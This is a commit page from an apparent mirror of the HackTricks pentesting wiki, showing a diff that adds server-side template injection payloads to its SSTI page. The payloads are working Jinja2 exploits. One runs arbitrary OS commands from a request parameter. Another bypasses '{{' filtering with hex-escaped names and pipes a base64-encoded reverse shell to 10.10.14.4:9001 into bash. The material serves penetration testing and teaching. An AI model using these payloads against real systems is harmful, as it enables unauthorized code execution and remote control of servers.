Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] one page modified

Browse source
This commit is contained in:
CPol 2021-06-25 15:02:22 +00:00 committed by gitbook-bot
parent e2bfe2cb32
commit f774ba603b
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 6 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
pentesting-web/ssti-server-side-template-injection/README.md
View file

@ -606,6 +606,12 @@ Simply modification of payload to clean up output and facilitate command input \
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
```
**Exploit SSTI without "{{" and "}}"**
```python
{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}
```
**Exploit the SSTI by writing an evil config file.**
```python